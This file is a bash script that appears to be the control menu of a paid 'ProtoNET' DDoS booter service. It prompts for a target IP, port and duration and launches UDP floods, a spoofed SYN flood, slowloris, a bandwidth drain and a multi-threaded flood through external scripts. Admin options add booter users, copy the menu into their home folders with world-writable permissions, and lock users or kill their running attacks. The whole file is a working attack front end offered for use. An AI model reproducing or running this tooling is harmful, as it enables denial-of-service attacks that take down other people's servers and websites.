#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
#TitaniumScript.bypass//BASH  Bypass.Function $invisible.inv
#
exit_script()
{
  echo "* * *Trap * * *"
  ./admin
}

lockkill()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +      Lock & Kill Attacks      + "
echo " +                               + "
echo " +-------------------------------+ "
echo "Enter Username: "
read uname
passwd -l $uname
kill -9 ps -u $uname -o "pid="
echo "Press any key when done"
read
}

adduser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Add New User        + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "New Username: "
read uname
useradd $uname
mkdir /home/$uname
cp /root/Booter/start /home/$uname/menu
passwd $uname 
cd /home/$uname
chmod 777 *
echo "User Added, Password set"
echo "Press any key when done"
read
}

deluser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Remove User         + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "Username: "
read uname
userdel $uname
rm -r /home/$uname
echo "User removed"
echo "Press any key when done"
read
}

lstprocesses()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +      List User Processes      + "
echo " +                               + "
echo " +-------------------------------+ "
echo "Enter Username: "
read uname
ps aux | grep -i $uname
echo "Press any key when done"
read
}

whoson()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Who Is On           + "
echo " +                               + "
echo " +-------------------------------+ "
w
echo "Press Any Key When Done"
read
}

dstat1()
{
    clear
    echo -e " ${CYAN} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                          ADMIN DSTAT                              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
dstat
    
}

panel()
{
    clear
    echo -e " ${CYAN} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                            HOME PANEL                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
./menu
    
}

udp_flooda()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              ProtoNET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              UDP DRAXz                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./gott.1.pl $ip $port 0 $time
}

udp_floodb()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                               PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                                  UDP                              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter the time :"
read time
python gott.2.py $ip $port $time
}

slap()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 3.5                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                            GoTT DRAXz                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address:"
read ip
perl gott.3.pl $ip
}

slowloris()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                        Slowloris DRAXz                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "To stop this script after execution hold [CTRL] + [C]"
echo "Enter Website URL:"
read host
echo "Enter The Port:"
read port
./slowloris $host $port
}

killall()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
pkill gott.1.pl
pkill gott.2.py
pkill gott.2.pl
pkill gott.4.pl
pkill slowloris
}

fry()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                         ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦             SUPER Nytro BY PROTONET STOP WITH CTRL+C              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address:"
read ip
echo "Enter The Port:"
read port
echo "Enter Size Of The Packages:"
read size
echo "Enter The Time In Seconds:"
read time
perl nytro.pl $ip $port $size $time

}

bw()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                    Bandwidth Drain DRAXz                     ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address:"
read ip
echo "Enter The Port:"
read port
echo "Enter The Time In Seconds:"
read time
./gott -i $ip -p $port -s 32000 -t $time
}

multi()
{
    clear
    echo -e " $CYAN} "
    echo "               ProtoNET MULTI FLOOD UPDATED "   
    echo "Script created by AlphaZ and get updated by Morten"
    echo ""	
    echo -e "        '||    ||'          '||    .    || " 
    echo -e "         |||  |||  ... ...   ||  .||.  ...  "
    echo -e "         |'|..'||   ||  ||   ||   ||    ||  "
    echo -e "         | '|' ||   ||  ||   ||   ||    ||  "
    echo -e "        .|. | .||.  '|..'|. .||.  '|.' .||. "
    echo ""
    echo "    If you wish to unlock this it will cost 5 bucks."
    echo ""
echo "Enter IP Address:"
read ip
echo "Enter Port:"
read port
echo "Enter size Ex: 65500"
read size
echo "Enter The Time In Seconds:"
read time
echo "Enter The Thread Count:"
read threads
echo "Would you like to see the output WARNING if yes flood may slow down! 0=No 1=Yes"
read output
perl cgi-bin.pl $ip $port $size $time $threads $output
}

syn()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 3.5 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                              PROTONET${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                            MODZ PROTONET${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                                Spoofed SyN Flood                  ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address:"
read ip
echo "Enter The Port:"
read port
./syn $ip $port
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
clear
echo -e "${WHITE}Created By PROTONET${RED}                           User:"${LIGHTBLUE}OWNER"${RED}Expires:"${LIGHTBLUE}Never
echo -e "${WHITE}                                                PRIVATE MENU 3.7 ENJOY
                                        "${WHITE}Your Version: "${GREEN}v3.7 "${RED}[Private Verison]
echo -e "${WHITE}
   #   P   r   o   j   e   c   t            ProjectProtoNET Private 3.7 ${WHITE}
  / \ / \ / \ / \ / \ / \ / \ / \         --------------------------------${CYAN}
 ( P | R | O | T | O | N | E | T )${LIGHTBLUE}        ¦VPS: RAM 4GO BANDWICH: 1GBPS  ¦${WHITE}
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/         --------------------------------
"${WHITE}
    echo -e "${WHITE}Note: "${GREEN}TO EXIT A SCRIPT OR STOP ATTACKS PRESS [CTRL+C]
    echo""
	echo -e "${LIGHTBLUE}[1]${GREEN}UDP Flood${LIGHTBLUE}                            [11] ADMIN DSTAT "                                                                                         																									
    echo -e "${LIGHTBLUE}[2]${GREEN}UDP Flood B${LIGHTBLUE}                          [12] Lock User And Kill Attacks"
    echo -e "${LIGHTBLUE}[3]${GREEN}Xtreme FlooD${LIGHTBLUE}                         [13] ADD USER"
    echo -e "${LIGHTBLUE}[4]${GREEN}SLOWLORIS${LIGHTBLUE}                            [14] DELETE USER"
    echo -e "${LIGHTBLUE}[5]${GREEN}PROTONET SCRIPT${LIGHTBLUE}                      [15] List of Processes" 
    echo -e "${LIGHTBLUE}[6]${GREEN}Bandwidth${LIGHTBLUE}                            [16] Whos On ?"
    echo -e "${LIGHTBLUE}[7]${GREEN}SyN Flood${LIGHTBLUE}                            [17] Home Panel"
    echo -e "${LIGHTBLUE}[8]${GREEN}Kill Attacks${BLUE}"
    echo -e "${LIGHTBLUE}[9]${LIGHTBLUE}Change Password${CYAN}"
	echo -e "${LIGHTBLUE}[10]${LIGHTBLUE}MULTI UPDATED${CYAN}"
    echo -e "                                                              Bypass [${GREEN}ON${CYAN}]"
    echo -n "#ProjectProtoNET - Enter Your Menu Choice [1-17]: "
    read yourch
    case $yourch in
      1) udp_flooda ;;
      2) udp_floodb ;;
      3) slap ;;
	  4) slowloris ;;
	  5) fry ;;
         6) bw ;;
         7) syn ;;
	  8) killall ;;
	  9) passwd ;;
	  10) multi ;;
	  11) dstat1 ;;
	  12) lockkill ;;
      13) adduser ;;
      14) deluser ;;
      15) lstprocesses ;;
      16) whoson ;;
	  17) panel ;;
      ex) echo "As you Command" ;  exit 1  ;;
	  end) pkill menu  ;;
      *) echo "Invalid Selection, Please make another selection between [1-11]" ;
         echo "Press Enter. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
Take_input1